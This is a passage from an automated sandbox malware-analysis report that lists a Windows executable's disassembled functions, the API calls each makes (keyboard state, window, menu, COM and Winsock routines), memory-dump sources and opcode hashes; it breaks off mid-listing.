                                                                                                                                        • Instruction Fuzzy Hash: 96712F75A01219EFDB10DFA4C888ADEB7B9FF49310F048495E919AB251DB38EE40CF94
                                                                                                                                        Function 007A388D Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetKeyboardState.USER32(?), ref: 007A3908
                                                                                                                                        • SetKeyboardState.USER32(?), ref: 007A3973
                                                                                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 007A3993
                                                                                                                                        • GetKeyState.USER32(000000A0), ref: 007A39AA
                                                                                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 007A39D9
                                                                                                                                        • GetKeyState.USER32(000000A1), ref: 007A39EA
                                                                                                                                        • GetAsyncKeyState.USER32(00000011), ref: 007A3A16
                                                                                                                                        • GetKeyState.USER32(00000011), ref: 007A3A24
                                                                                                                                        • GetAsyncKeyState.USER32(00000012), ref: 007A3A4D
                                                                                                                                        • GetKeyState.USER32(00000012), ref: 007A3A5B
                                                                                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 007A3A84
                                                                                                                                        • GetKeyState.USER32(0000005B), ref: 007A3A92
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: State$Async$Keyboard
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 541375521-0
                                                                                                                                        • Opcode ID: 1301e7033ee2befcacf061bbbece7863b83bebbf682db855f7b2eaf6e0d1b694
                                                                                                                                        • Instruction ID: fbfb2a97e6d5ec91fe720cc26bb10f7566e860f430b8603d33c1abd79e6e90d5
                                                                                                                                        • Opcode Fuzzy Hash: 1301e7033ee2befcacf061bbbece7863b83bebbf682db855f7b2eaf6e0d1b694
                                                                                                                                        • Instruction Fuzzy Hash: 1951E820A047D469FB35EFA488157AAAFB45F83340F088789F5C25A1C2DA9C9B8CC771
                                                                                                                                        Function 0079FAFD Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetDlgItem.USER32(?,00000001), ref: 0079FB19
                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 0079FB2B
                                                                                                                                        • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0079FB89
                                                                                                                                        • GetDlgItem.USER32(?,00000002), ref: 0079FB94
                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 0079FBA6
                                                                                                                                        • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0079FBFC
                                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 0079FC0A
                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 0079FC1B
                                                                                                                                        • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0079FC5E
                                                                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 0079FC6C
                                                                                                                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0079FC89
                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 0079FC96
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3096461208-0
                                                                                                                                        • Opcode ID: bf02aa642a131672cdec98f3506b70ffb2d559e80be9354942d622689de66f7a
                                                                                                                                        • Instruction ID: 722f3e50a3d7d20dbaa60f75945900e6a6f6de4b8a6cf82ba8fd07eada773c32
                                                                                                                                        • Opcode Fuzzy Hash: bf02aa642a131672cdec98f3506b70ffb2d559e80be9354942d622689de66f7a
                                                                                                                                        • Instruction Fuzzy Hash: 7E5112B1B00209AFDF18DF69DD95AAEBBB6EB88350F14813DF915D7290D7759D008B10
                                                                                                                                        Function 0077B039 Relevance: 18.1, APIs: 12, Instructions: 131COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0077B155: GetWindowLongW.USER32(?,000000EB), ref: 0077B166
                                                                                                                                        • GetSysColor.USER32(0000000F), ref: 0077B067
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ColorLongWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 259745315-0
                                                                                                                                        • Opcode ID: 8307da000235aa5111b7e2a7e276832690ca9c534b64bac1c154421588497028
                                                                                                                                        • Instruction ID: cd920aa891ab1f0e7322651e31a481a53e77032738e007a3d4dd4cee863e7e18
                                                                                                                                        • Opcode Fuzzy Hash: 8307da000235aa5111b7e2a7e276832690ca9c534b64bac1c154421588497028
                                                                                                                                        • Instruction Fuzzy Hash: 2341C231100544AFDF316F28DC88BBA3B66AB4A7B0F158265FD798E2E1D7398C41DB21
                                                                                                                                        Function 007A7334 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 136442275-0
                                                                                                                                        • Opcode ID: c04f3c6376a95111ca878a3b6adb14c15783508c7273d6aee60587ca0b569db2
                                                                                                                                        • Instruction ID: 67f201664ca176274fe9f5a83a4e36a9d8fd5000379bae35c1af125cdca05d8c
                                                                                                                                        • Opcode Fuzzy Hash: c04f3c6376a95111ca878a3b6adb14c15783508c7273d6aee60587ca0b569db2
                                                                                                                                        • Instruction Fuzzy Hash: AF410CB284426CAADF25EB50CC45EDE73BCAB48310F4041E6F519A2041EB39AFD5CFA4
                                                                                                                                        Function 007684A6 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • __swprintf.LIBCMT ref: 007684E5
                                                                                                                                        • __itow.LIBCMT ref: 00768519
                                                                                                                                          • Part of subcall function 00782177: _xtow@16.LIBCMT ref: 00782198
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __itow__swprintf_xtow@16
                                                                                                                                        • String ID: %.15g$0x%p$False$True
                                                                                                                                        • API String ID: 1502193981-2263619337
                                                                                                                                        • Opcode ID: 331cc3b03d729929ad9e5a7d25788c5722b6617daf197fbdfd6ee48174609501
                                                                                                                                        • Instruction ID: 7f92e4fed10d7df628c2dbe1758ca719cf75bd078195ef3b22637d2d8250d80f
                                                                                                                                        • Opcode Fuzzy Hash: 331cc3b03d729929ad9e5a7d25788c5722b6617daf197fbdfd6ee48174609501
                                                                                                                                        • Instruction Fuzzy Hash: 0F412371A00609EBDB25EF78D845E6A77F9FF44310F20446BE84BD6282EE399A41CB11
                                                                                                                                        Function 00785C91 Relevance: 16.8, APIs: 11, Instructions: 257COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 00785CCA
                                                                                                                                          • Part of subcall function 0078889E: __getptd_noexit.LIBCMT ref: 0078889E
                                                                                                                                        • __gmtime64_s.LIBCMT ref: 00785D63
                                                                                                                                        • __gmtime64_s.LIBCMT ref: 00785D99
                                                                                                                                        • __gmtime64_s.LIBCMT ref: 00785DB6
                                                                                                                                        • __allrem.LIBCMT ref: 00785E0C
                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00785E28
                                                                                                                                        • __allrem.LIBCMT ref: 00785E3F
                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00785E5D
                                                                                                                                        • __allrem.LIBCMT ref: 00785E74
                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00785E92
                                                                                                                                        • __invoke_watson.LIBCMT ref: 00785F03
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 384356119-0
                                                                                                                                        • Opcode ID: 44019df33dda40162e7ad5693cac5fdd13db5b94ac58de4e6029986730a9c23d
                                                                                                                                        • Instruction ID: f5574e172ca3211ca213474205ed62b480fcf9d6576e8d276e8a63140d38338d
                                                                                                                                        • Opcode Fuzzy Hash: 44019df33dda40162e7ad5693cac5fdd13db5b94ac58de4e6029986730a9c23d
                                                                                                                                        • Instruction Fuzzy Hash: F071FA71A41F17EBDB14FF78DC85B6A73A8AF10724F144229F910EB681E778DA408B91
                                                                                                                                        Function 007A57FB Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 007A5816
                                                                                                                                        • GetMenuItemInfoW.USER32(008218F0,000000FF,00000000,00000030), ref: 007A5877
                                                                                                                                        • SetMenuItemInfoW.USER32(008218F0,00000004,00000000,00000030), ref: 007A58AD
                                                                                                                                        • Sleep.KERNEL32(000001F4), ref: 007A58BF
                                                                                                                                        • GetMenuItemCount.USER32(?), ref: 007A5903
                                                                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 007A591F
                                                                                                                                        • GetMenuItemID.USER32(?,-00000001), ref: 007A5949
                                                                                                                                        • GetMenuItemID.USER32(?,?), ref: 007A598E
                                                                                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 007A59D4
                                                                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007A59E8
                                                                                                                                        • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007A5A09
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4176008265-0
                                                                                                                                        • Opcode ID: 46ea57092775c052544f81f386851cbe37496d2e5efff2c5497a96211f400cbf
                                                                                                                                        • Instruction ID: 50ab904f6d65e591757dc053733015ef311c2b587c0755d2f27ccdb8509727c8
                                                                                                                                        • Opcode Fuzzy Hash: 46ea57092775c052544f81f386851cbe37496d2e5efff2c5497a96211f400cbf
                                                                                                                                        • Instruction Fuzzy Hash: 0661B271A00689EFDF21CFA4C8C8AAF7BB8FB86314F144259F441AB251D739AD45CB20
                                                                                                                                        Function 007C9A23 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 007C9AA5
                                                                                                                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 007C9AA8
                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 007C9ACC
                                                                                                                                        • _memset.LIBCMT ref: 007C9ADD
                                                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 007C9AEF
                                                                                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 007C9B67
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$LongWindow_memset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 830647256-0
                                                                                                                                        • Opcode ID: a49af8d4ebd1dad81e3e126edcf09fb8a932d86c0a31c4edd5f0a27965e7c1f9
                                                                                                                                        • Instruction ID: 49a0fac15486a1464fdf05c9798bcaf01cabaae2c3af51bf97e5bacb3882e072
                                                                                                                                        • Opcode Fuzzy Hash: a49af8d4ebd1dad81e3e126edcf09fb8a932d86c0a31c4edd5f0a27965e7c1f9
                                                                                                                                        • Instruction Fuzzy Hash: 3E615A75A00248AFDB21DFA4CC89FEE77B8EB09700F104169FA15E7291D778AD45DB60
                                                                                                                                        Function 007A3569 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetKeyboardState.USER32(?), ref: 007A3591
                                                                                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 007A3612
                                                                                                                                        • GetKeyState.USER32(000000A0), ref: 007A362D
                                                                                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 007A3647
                                                                                                                                        • GetKeyState.USER32(000000A1), ref: 007A365C
                                                                                                                                        • GetAsyncKeyState.USER32(00000011), ref: 007A3674
                                                                                                                                        • GetKeyState.USER32(00000011), ref: 007A3686
                                                                                                                                        • GetAsyncKeyState.USER32(00000012), ref: 007A369E
                                                                                                                                        • GetKeyState.USER32(00000012), ref: 007A36B0
                                                                                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 007A36C8
                                                                                                                                        • GetKeyState.USER32(0000005B), ref: 007A36DA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: State$Async$Keyboard
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 541375521-0
                                                                                                                                        • Opcode ID: 70dbb8fe0574cffe399968e2cf418397f51e669cd943177ea8032927183f8c62
                                                                                                                                        • Instruction ID: a23e568ad92e1d883b33b6d332fffd6b26b7a96970d7d9e4056c6e20d62c673c
                                                                                                                                        • Opcode Fuzzy Hash: 70dbb8fe0574cffe399968e2cf418397f51e669cd943177ea8032927183f8c62
                                                                                                                                        • Instruction Fuzzy Hash: 6A41D6609047C97DFF308F6484143B6BEA06B57344F048259F5C64A2C2EBAC9FD8CB66
                                                                                                                                        Function 0079A28D Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 0079A2AA
                                                                                                                                        • SafeArrayAllocData.OLEAUT32(?), ref: 0079A2F5
                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 0079A307
                                                                                                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 0079A327
                                                                                                                                        • VariantCopy.OLEAUT32(?,?), ref: 0079A36A
                                                                                                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 0079A37E
                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 0079A393
                                                                                                                                        • SafeArrayDestroyData.OLEAUT32(?), ref: 0079A3A0
                                                                                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0079A3A9
                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 0079A3BB
                                                                                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0079A3C6
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2706829360-0
                                                                                                                                        • Opcode ID: 19103343b238f0c2fd29ad6889edacb841d44b9665d78a1bcdbfb546b0a1b773
                                                                                                                                        • Instruction ID: 7d7b327df7198ba7998b79f67a6a416ba75b9043eb8205aadcb88a4ed6fae794
                                                                                                                                        • Opcode Fuzzy Hash: 19103343b238f0c2fd29ad6889edacb841d44b9665d78a1bcdbfb546b0a1b773
                                                                                                                                        • Instruction Fuzzy Hash: 16416D31901259EFCF11DFA4DC88DDEBBB9FF49304F108065E912A7261DB38AA45CBA1
                                                                                                                                        Function 007BB250 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 007684A6: __swprintf.LIBCMT ref: 007684E5
                                                                                                                                          • Part of subcall function 007684A6: __itow.LIBCMT ref: 00768519
                                                                                                                                        • CoInitialize.OLE32 ref: 007BB298
                                                                                                                                        • CoUninitialize.COMBASE ref: 007BB2A3
                                                                                                                                        • CoCreateInstance.COMBASE(?,00000000,00000017,007ED8FC,?), ref: 007BB303
                                                                                                                                        • IIDFromString.COMBASE(?,?), ref: 007BB376
                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 007BB410
                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 007BB471
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                                                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                        • API String ID: 834269672-1287834457
                                                                                                                                        • Opcode ID: 8a57977f71ce25417037a977779534ae60ab290cc27715395aa00ae8460b286e
                                                                                                                                        • Instruction ID: 1fd6ca71d12cb4062463a1856125cdd69b7fa895d66e5d9683b26f666388ea8a
                                                                                                                                        • Opcode Fuzzy Hash: 8a57977f71ce25417037a977779534ae60ab290cc27715395aa00ae8460b286e
                                                                                                                                        • Instruction Fuzzy Hash: BA617971208741AFD710DF54C889BAEB7E8EF89714F004919F9859B291D7B8ED48CB92
                                                                                                                                        Function 007B8694 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • WSAStartup.WS2_32(00000101,?), ref: 007B86F5
                                                                                                                                        • inet_addr.WS2_32(?), ref: 007B873A
                                                                                                                                        • gethostbyname.WS2_32(?), ref: 007B8746
                                                                                                                                        • IcmpCreateFile.IPHLPAPI ref: 007B8754
